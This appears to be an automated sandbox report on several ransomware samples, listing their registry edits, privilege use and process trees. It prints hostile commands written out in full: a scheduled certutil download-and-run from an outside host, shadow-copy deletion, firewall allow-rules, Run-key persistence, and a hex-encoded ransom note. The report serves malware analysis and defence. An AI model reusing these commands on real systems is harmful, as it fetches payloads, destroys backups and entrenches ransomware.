\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" csrss.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings OpenWith.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2636 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 1008 NOTEPAD.EXE 5664 NOTEPAD.EXE 5084 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8932 schtasks.exe 6320 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4572 taskmgr.exe 7356 OpenWith.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2792 HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2784 7zFM.exe Token: 35 2784 7zFM.exe Token: SeSecurityPrivilege 2784 7zFM.exe Token: SeDebugPrivilege 1312 taskmgr.exe Token: SeSystemProfilePrivilege 1312 taskmgr.exe Token: SeCreateGlobalPrivilege 1312 taskmgr.exe Token: SeDebugPrivilege 4572 taskmgr.exe Token: SeSystemProfilePrivilege 4572 taskmgr.exe Token: SeCreateGlobalPrivilege 4572 taskmgr.exe Token: 33 1312 taskmgr.exe Token: SeIncBasePriorityPrivilege 1312 taskmgr.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeBackupPrivilege 1704 vssvc.exe Token: SeRestorePrivilege 1704 vssvc.exe Token: SeAuditPrivilege 1704 vssvc.exe Token: SeDebugPrivilege 648 HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe Token: SeIncreaseQuotaPrivilege 4008 WMIC.exe Token: SeSecurityPrivilege 4008 WMIC.exe Token: SeTakeOwnershipPrivilege 4008 WMIC.exe Token: SeLoadDriverPrivilege 4008 WMIC.exe Token: SeSystemProfilePrivilege 4008 WMIC.exe Token: SeSystemtimePrivilege 4008 WMIC.exe Token: SeProfSingleProcessPrivilege 4008 WMIC.exe Token: SeIncBasePriorityPrivilege 4008 WMIC.exe Token: SeCreatePagefilePrivilege 4008 WMIC.exe Token: SeBackupPrivilege 4008 WMIC.exe Token: SeRestorePrivilege 4008 WMIC.exe Token: SeShutdownPrivilege 4008 WMIC.exe Token: SeDebugPrivilege 4008 WMIC.exe Token: SeSystemEnvironmentPrivilege 4008 WMIC.exe Token: SeRemoteShutdownPrivilege 4008 WMIC.exe Token: SeUndockPrivilege 4008 WMIC.exe Token: SeManageVolumePrivilege 4008 WMIC.exe Token: 33 4008 WMIC.exe Token: 34 4008 WMIC.exe Token: 35 4008 WMIC.exe Token: 36 4008 WMIC.exe Token: 35 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe Token: SeIncreaseQuotaPrivilege 4008 WMIC.exe Token: SeSecurityPrivilege 4008 WMIC.exe Token: SeTakeOwnershipPrivilege 4008 WMIC.exe Token: SeLoadDriverPrivilege 4008 WMIC.exe Token: SeSystemProfilePrivilege 4008 WMIC.exe Token: SeSystemtimePrivilege 4008 WMIC.exe Token: SeProfSingleProcessPrivilege 4008 WMIC.exe Token: SeIncBasePriorityPrivilege 4008 WMIC.exe Token: SeCreatePagefilePrivilege 4008 WMIC.exe Token: SeBackupPrivilege 4008 WMIC.exe Token: SeRestorePrivilege 4008 WMIC.exe Token: SeShutdownPrivilege 4008 WMIC.exe Token: SeDebugPrivilege 4008 WMIC.exe Token: SeSystemEnvironmentPrivilege 4008 WMIC.exe Token: SeRemoteShutdownPrivilege 4008 WMIC.exe Token: SeUndockPrivilege 4008 WMIC.exe Token: SeManageVolumePrivilege 4008 WMIC.exe Token: 33 4008 WMIC.exe Token: 34 4008 WMIC.exe Token: 35 4008 WMIC.exe Token: 36 4008 WMIC.exe Token: SeIncreaseQuotaPrivilege 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSecurityPrivilege 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeTakeOwnershipPrivilege 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeLoadDriverPrivilege 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSystemProfilePrivilege 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2784 7zFM.exe 2784 7zFM.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 6524 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1312 wrote to memory of 4572 1312 taskmgr.exe 97 PID 1312 wrote to memory of 4572 1312 taskmgr.exe 97 PID 2592 wrote to memory of 4956 2592 powershell.exe 112 PID 2592 wrote to memory of 4956 2592 powershell.exe 112 PID 4956 wrote to memory of 648 4956 cmd.exe 113 PID 4956 wrote to memory of 648 4956 cmd.exe 113 PID 4956 wrote to memory of 4728 4956 cmd.exe 114 PID 4956 wrote to memory of 4728 4956 cmd.exe 114 PID 4956 wrote to memory of 4728 4956 cmd.exe 114 PID 4956 wrote to memory of 1824 4956 cmd.exe 115 PID 4956 wrote to memory of 1824 4956 cmd.exe 115 PID 4956 wrote to memory of 1824 4956 cmd.exe 115 PID 4956 wrote to memory of 2116 4956 cmd.exe 116 PID 4956 wrote to memory of 2116 4956 cmd.exe 116 PID 4956 wrote to memory of 2116 4956 cmd.exe 116 PID 4956 wrote to memory of 2080 4956 cmd.exe 118 PID 4956 wrote to memory of 2080 4956 cmd.exe 118 PID 4956 wrote to memory of 2080 4956 cmd.exe 118 PID 4956 wrote to memory of 3128 4956 cmd.exe 119 PID 4956 wrote to memory of 3128 4956 cmd.exe 119 PID 4956 wrote to memory of 3128 4956 cmd.exe 119 PID 4728 wrote to memory of 5024 4728 HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe 122 PID 4728 wrote to memory of 5024 4728 HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe 122 PID 4728 wrote to memory of 5024 4728 HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe 122 PID 4956 wrote to memory of 1056 4956 cmd.exe 121 PID 4956 wrote to memory of 1056 4956 cmd.exe 121 PID 4956 wrote to memory of 3448 4956 cmd.exe 124 PID 4956 wrote to memory of 3448 4956 cmd.exe 124 PID 4956 wrote to memory of 3448 4956 cmd.exe 124 PID 4956 wrote to memory of 2792 4956 cmd.exe 125 PID 4956 wrote to memory of 2792 4956 cmd.exe 125 PID 4956 wrote to memory of 2792 4956 cmd.exe 125 PID 4956 wrote to memory of 3088 4956 cmd.exe 126 PID 4956 wrote to memory of 3088 4956 cmd.exe 126 PID 4956 wrote to memory of 3088 4956 cmd.exe 126 PID 5024 wrote to memory of 844 5024 wscript.exe 131 PID 5024 wrote to memory of 844 5024 wscript.exe 131 PID 5024 wrote to memory of 844 5024 wscript.exe 131 PID 4956 wrote to memory of 1264 4956 cmd.exe 133 PID 4956 wrote to memory of 1264 4956 cmd.exe 133 PID 4956 wrote to memory of 1264 4956 cmd.exe 133 PID 2080 wrote to memory of 3440 2080 HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe 135 PID 2080 wrote to memory of 3440 2080 HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe 135 PID 4956 wrote to memory of 4996 4956 cmd.exe 137 PID 4956 wrote to memory of 4996 4956 cmd.exe 137 PID 4956 wrote to memory of 4996 4956 cmd.exe 137 PID 3440 wrote to memory of 4008 3440 cmd.exe 138 PID 3440 wrote to memory of 4008 3440 cmd.exe 138 PID 4956 wrote to memory of 4736 4956 cmd.exe 139 PID 4956 wrote to memory of 4736 4956 cmd.exe 139 PID 4956 wrote to memory of 4736 4956 cmd.exe 139 PID 4736 wrote to memory of 3404 4736 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 140 PID 4736 wrote to memory of 3404 4736 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 140 PID 4736 wrote to memory of 3404 4736 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 140 PID 4956 wrote to memory of 4728 4956 cmd.exe 141 PID 4956 wrote to memory of 4728 4956 cmd.exe 141 PID 4956 wrote to memory of 4728 4956 cmd.exe 141 PID 4728 wrote to memory of 5296 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 142 PID 4728 wrote to memory of 5296 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 142 PID 4956 wrote to memory of 5520 4956 cmd.exe 144 PID 4956 wrote to memory of 5520 4956 cmd.exe 144 PID 4956 wrote to memory of 5520 4956 cmd.exe 144 PID 844 wrote to memory of 2636 844 cmd.exe 146 PID 844 wrote to memory of 2636 844 cmd.exe 146 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = 48006900200043006f006d00700061006e0079002c000d000a000d000a00450076006500720079002000620079007400650020006f006e00200061006e00790020007400790070006500730020006f006600200079006f0075007200200064006500760069006300650073002000770061007300200065006e0063007200790070007400650064002e000d000a0044006f006e00270074002000740072007900200074006f00200075007300650020006200610063006b007500700073002000620065006300610075007300650020006900740020007700650072006500200065006e006300720079007000740065006400200074006f006f002e000d000a000d000a0054006f002000670065007400200061006c006c00200079006f00750072002000640061007400610020006200610063006b00200063006f006e0074006100630074002000750073003a000d000a007200610069006e00670065006d006100780069006d006f004000700072006f0074006f006e006d00610069006c002e0063006f006d000d000a006700610072006500740068002e006d0063006b006900650033006c004000700072006f0074006f006e006d00610069006c002e0063006f006d000d000a002d002d002d002d002d002d002d002d002d002d002d002d002d002d000d000a000d000a004600410051003a000d000a000d000a0031002e000d000a0020002000200051003a00200048006f0077002000630061006e002000490020006d0061006b00650020007300750072006500200079006f007500200064006f006e0027007400200066006f006f006c0069006e00670020006d0065003f000d000a0020002000200041003a00200059006f0075002000630061006e002000730065006e006400200075007300200032002000660069006c006500730028006d0061007800200032006d00620029002e000d000a000d000a0032002e000d000a0020002000200051003a0020005700680061007400200074006f00200064006f00200074006f002000670065007400200061006c006c002000640061007400610020006200610063006b003f000d000a0020002000200041003a00200044006f006e0027007400200072006500730074006100720074002000740068006500200063006f006d00700075007400650072002c00200064006f006e002700740020006d006f00760065002000660069006c0065007300200061006e0064002000770072006900740065002000750073002e000d000a000d000a0033002e000d000a0020002000200051003a0020005700680061007400200074006f002000740065006c006c0020006d007900200062006f00730073003f000d000a0020002000200041003a002000500072006f007400650063007400200059006f00750072002000530079007300740065006d00200041006d00690067006f002e000d000a000d000a000000 HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = 50005900530041000000 HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00403.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2784
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:648 -
C:\Users\Admin\AppData\Roaming\backup.exe"C:\Users\Admin\AppData\Roaming\backup.exe"4⤵
- Executes dropped EXE
PID:5444
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Updates\h.vbs" "C:\Updates\ZTH.bat"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Updates\ZTH.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateHandler /d "wscript "C:\Updates\h.vbs" "C:\Updates\Exec.bat""6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2636
-
-
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 16124⤵
- Program crash
PID:7040
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes"5⤵PID:7388
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2444
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2408
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:8636 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:8932
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:6320
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
PID:7868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:7752
-
-
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe3⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete4⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3128
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exeHEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1056
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 4884⤵
- Program crash
PID:2448
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exeHEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- System policy modification
PID:2792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\update.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5076
-
-
-
